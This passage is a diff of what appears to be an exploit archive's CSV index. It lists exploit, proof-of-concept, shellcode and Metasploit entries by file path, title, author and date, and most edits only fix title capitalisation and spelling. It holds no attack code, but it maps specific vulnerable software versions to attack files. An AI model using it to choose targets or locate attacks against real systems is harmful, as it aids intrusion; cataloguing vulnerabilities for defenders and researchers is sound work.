Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 +37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 +37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin - 'id' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat Plugin - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 37487,platforms/multiple/dos/37487.txt,"Apache Sling - Denial Of Service",2012-07-06,IOactive,multiple,dos,0 -37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 +37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - Denial of Service (PoC)",2015-07-09,Arsyntex,linux,dos,0 -37563,platforms/php/webapps/37563.html,"Wordpress G-Lock Double Opt-in Manager Plugin - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 +37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Inject",2015-07-05,Vulnerability-Lab,ios,webapps,0 -37534,platforms/php/webapps/37534.txt,"Wordpress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 +37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0 -37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 Plugin - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 +37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 Plugin - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37500,platforms/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,php,webapps,0 -37501,platforms/php/webapps/37501.rb,"Wordpress Generic Plugin - Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 +37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin - Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board - Multiple SQL Injections",2012-07-15,ToXiC,php,webapps,0 37503,platforms/php/webapps/37503.txt,"Event Calender PHP - Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 -37506,platforms/php/webapps/37506.php,"Wordpress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 +37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 37507,platforms/php/webapps/37507.txt,"web@all - 'name' Parameter Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 37508,platforms/php/webapps/37508.txt,"Rama Zeiten CMS - 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps,0 37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 @@ -33863,15 +33866,15 @@ id,file,description,date,author,platform,type,port 37511,platforms/php/webapps/37511.txt,"AVA VoIP - Multiple Security Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",php,webapps,0 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - launchAgent.do return-To Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - fileSystem.do Multiple Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 -37514,platforms/php/webapps/37514.txt,"Wordpress ACF Frontend Display Plugin 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80 +37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80 37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 -37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 +37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 37518,platforms/multiple/dos/37518.html,"Arora Browser - Remote Denial of Service",2012-07-18,t3rm!n4t0r,multiple,dos,0 -37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component - 'controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 -37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI Redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 +37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 +37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 -37522,platforms/php/webapps/37522.txt,"Wordpress chenpress Plugin - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 +37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free",2015-07-08,Metasploit,multiple,remote,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 - Service Disabling",2015-07-08,hyp3rlinx,windows,dos,0 @@ -33879,7 +33882,7 @@ id,file,description,date,author,platform,type,port 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0 -37530,platforms/php/webapps/37530.txt,"Wordpress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 +37530,platforms/php/webapps/37530.txt,"WordPress WP E-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 @@ -33887,11 +33890,11 @@ id,file,description,date,author,platform,type,port 37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0 37539,platforms/php/webapps/37539.txt,"REDAXO - 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 -37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 +37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile Component - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0 -37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 +37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 -37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI Redirection",2012-07-29,"Aung Khant",php,webapps,0 +37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI redirection",2012-07-29,"Aung Khant",php,webapps,0 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0 @@ -33904,11 +33907,11 @@ id,file,description,date,author,platform,type,port 37556,platforms/php/webapps/37556.txt,"Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash (PoC)",2015-07-10,"Rahul Pratap Singh",windows,dos,0 -37559,platforms/php/webapps/37559.txt,"Wordpress CP Image Store with Slideshow Plugin 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 -37560,platforms/php/webapps/37560.txt,"Wordpress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 +37559,platforms/php/webapps/37559.txt,"WordPress CP Image Store with Slideshow Plugin 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 +37560,platforms/php/webapps/37560.txt,"WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37562,platforms/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 -37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-By-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 +37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 @@ -33926,7 +33929,7 @@ id,file,description,date,author,platform,type,port 37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37586,platforms/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 -37587,platforms/php/webapps/37587.txt,"GetSimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 +37587,platforms/php/webapps/37587.txt,"Getsimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 37589,platforms/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 37590,platforms/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 @@ -33934,26 +33937,26 @@ id,file,description,date,author,platform,type,port 37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80 37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",windows,dos,0 37594,platforms/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection",2015-07-13,"ali ahmady",php,webapps,80 -37595,platforms/php/webapps/37595.txt,"phpVibe - Aribtrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80 +37595,platforms/php/webapps/37595.txt,"phpVibe - Arbitrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80 37596,platforms/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,php,webapps,80 37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution",2015-07-13,Metasploit,hardware,remote,443 37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution",2015-07-13,Metasploit,multiple,remote,5900 37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free",2015-07-13,Metasploit,windows,remote,0 37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution",2015-07-13,Metasploit,multiple,remote,617 -37601,platforms/php/webapps/37601.txt,"Wordpress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 +37601,platforms/php/webapps/37601.txt,"WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80 -37603,platforms/php/webapps/37603.txt,"Wordpress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 +37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80 -37622,platforms/php/webapps/37622.txt,"Wordpress Download Manager Free 2.7.94 & Pro 4 Plugin - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",php,webapps,0 -37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 +37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Plugin - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",php,webapps,0 +37607,platforms/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0 37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0 -37611,platforms/windows/remote/37611.php,"Impero Education Pro - SYSTEM Remote Command Execution",2015-07-14,slipstream,windows,remote,0 +37611,platforms/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,windows,remote,0 37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash (PoC)",2015-07-14,"SATHISH ARTHAR",windows,dos,0 37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 -37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 +37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 @@ -33963,14 +33966,14 @@ id,file,description,date,author,platform,type,port 37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0 37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0 -37629,platforms/php/webapps/37629.txt,"Wordpress BuddyPress Activity Plus Plugin 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80 +37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80 37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter - Multiple Cross-Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 37633,platforms/php/webapps/37633.txt,"mIRC - 'projects.php' Cross-Site Scripting",2012-08-10,TayfunBasoglu,php,webapps,0 37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion",2012-08-11,L0n3ly-H34rT,php,webapps,0 37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host - Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps,0 -37636,platforms/php/webapps/37636.txt,"ShopperPress Wordpress Theme - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 +37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps,0 37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox - Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 @@ -33983,12 +33986,12 @@ id,file,description,date,author,platform,type,port 37646,platforms/php/webapps/37646.txt,"Banana Dance - Cross-Site Scripting / SQL Injection",2012-08-22,"Canberk BOLAT",php,webapps,0 37647,platforms/multiple/remote/37647.txt,"Apache Struts2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0 37648,platforms/php/webapps/37648.txt,"Joomla! CiviCRM Component - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,php,webapps,0 -37649,platforms/php/webapps/37649.html,"SiNG cms - 'password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 +37649,platforms/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 37652,platforms/php/webapps/37652.txt,"KindEditor - 'name' Parameter Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 -37653,platforms/php/webapps/37653.txt,"Wordpress Rich Widget Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 -37654,platforms/php/webapps/37654.txt,"Wordpress Monsters Editor for WP Super Edit Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 +37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 +37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin - Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 @@ -34001,22 +34004,22 @@ id,file,description,date,author,platform,type,port 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload",2015-07-21,Metasploit,java,remote,0 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection Denial of Service (PoC)",2015-07-22,"Todor Donev",windows,dos,0 -37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 +37670,platforms/osx/local/37670.sh,"Apple Mac OS X 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos,0 37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 -37677,platforms/php/webapps/37677.txt,"Wordpress Finder Plugin - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 +37677,platforms/php/webapps/37677.txt,"WordPress Finder Plugin - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 37679,platforms/php/webapps/37679.txt,"LibGuides - Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host - 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps,0 -37681,platforms/php/webapps/37681.txt,"Wordpress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 -37682,platforms/php/webapps/37682.txt,"Wordpress Simple:Press Forum Plugin - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 +37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 +37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin - Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 -37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",xml,dos,0 +37685,platforms/xml/dos/37685.txt,"SquidGuard 1.4 - Long URL Handling Remote Denial of Service",2012-08-30,"Stefan Bauer",xml,dos,0 37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G 3.0.1.4912 - Cross-Site Request Forgery",2015-07-24,hyp3rlinx,multiple,webapps,0 37687,platforms/php/webapps/37687.txt,"TomatoCart - 'example_form.ajax.php' Cross-Site Scripting",2012-08-30,HauntIT,php,webapps,0 37689,platforms/asp/webapps/37689.txt,"XM Forum - 'search.asp' SQL Injection",2012-08-30,Crim3R,asp,webapps,0 @@ -34029,16 +34032,16 @@ id,file,description,date,author,platform,type,port 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS - 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 37697,platforms/php/webapps/37697.txt,"PHPFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 37698,platforms/php/webapps/37698.txt,"Kayako Fusion - 'download.php' Cross-Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0 -37699,platforms/windows/local/37699.py,"Foxit Reader - .png Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 +37699,platforms/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 